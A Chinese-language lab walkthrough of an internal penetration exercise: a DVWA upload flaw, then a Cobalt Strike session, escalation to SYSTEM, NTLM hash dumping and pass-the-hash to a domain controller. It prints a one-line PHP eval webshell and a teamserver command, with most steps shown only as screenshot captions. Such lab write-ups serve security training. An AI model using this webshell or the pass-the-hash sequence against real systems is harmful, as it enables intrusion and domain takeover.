内网渗透、哈希传递、获取域控权限

网络拓扑

内网渗透、哈希传递、获取域控权限_第1张图片

  • kali(桥接)

    10.9.47.221

  • win11(nat 模式)

    192.168.1.130

  • DMZ(win7)

    网卡1(桥接)10.9.47.110

    网卡2(仅主机)172.16.1.128

  • 域控(win 2008)(仅主机)

    172.16.1.129

要求

  1. 域控主机搭建域环境,DMZ 主机加⼊域内
  2. DMZ 主机存在⽂件上传漏洞和命令执⾏漏洞
  3. 获取 DMZ 主机控制权限,写⼊⼀句话⽊⻢或者上传⼀句话⽊⻢并连接
  4. cs ⽣成⽊⻢,使 DMZ 主机上线 cs
  5. 提权到 system 权限,⽣成 smblistener
  6. 使⽤哈西传递操作横向移动到预控,拿下预控权限
  7. 搭建正向代理,在 win11 上直接访问到预控主机的服务,例如 3389 或者 web

获取 webshell

使用 dvwa 文件上传模拟漏洞

准备一句话木马

1.php

 @eval($_REQUEST['gjl']);?>

访问 DMZ(win7)

10.9.47.110/dvwa

调到 low 模式上传一句话木马

内网渗透、哈希传递、获取域控权限_第2张图片

蚁剑连接

内网渗透、哈希传递、获取域控权限_第3张图片

Cobalt Strike 环境搭建

cs 服务端搭建、登录

kali 开启 teamserver

./teamserver 10.9.47.221 123456

内网渗透、哈希传递、获取域控权限_第4张图片

win11 开启客户端

内网渗透、哈希传递、获取域控权限_第5张图片

提权

内网渗透、哈希传递、获取域控权限_第6张图片

选择监听模块并生成

内网渗透、哈希传递、获取域控权限_第7张图片

使用蚁剑将木马上传到 DMZ 上

内网渗透、哈希传递、获取域控权限_第8张图片

使用蚁剑打开命令终端运行该程序, DMZ 主机上线

artiface_x64.exe

此时 DMZ 主机还是普通用户权限

内网渗透、哈希传递、获取域控权限_第9张图片

提权到管理员

内网渗透、哈希传递、获取域控权限_第10张图片

内网渗透、哈希传递、获取域控权限_第11张图片

成功提权

内网渗透、哈希传递、获取域控权限_第12张图片

提权到 system

内网渗透、哈希传递、获取域控权限_第13张图片

内网渗透、哈希传递、获取域控权限_第14张图片

内网渗透、哈希传递、获取域控权限_第15张图片

横向移动

抓取本地 ntlm hash

内网渗透、哈希传递、获取域控权限_第16张图片

内网渗透、哈希传递、获取域控权限_第17张图片

内网扫描

内网渗透、哈希传递、获取域控权限_第18张图片

内网渗透、哈希传递、获取域控权限_第19张图片

查看扫描出的内网主机

内网渗透、哈希传递、获取域控权限_第20张图片

哈希传递

内网渗透、哈希传递、获取域控权限_第21张图片

内网渗透、哈希传递、获取域控权限_第22张图片

选择刚刚创建的 smb 监听

内网渗透、哈希传递、获取域控权限_第23张图片

指定成功传递后与哪个主机做连接

内网渗透、哈希传递、获取域控权限_第24张图片

成功横向移动

内网渗透、哈希传递、获取域控权限_第25张图片

内网渗透、哈希传递、获取域控权限_第26张图片

你可能感兴趣的:(内网,web安全,网络安全,安全,笔记)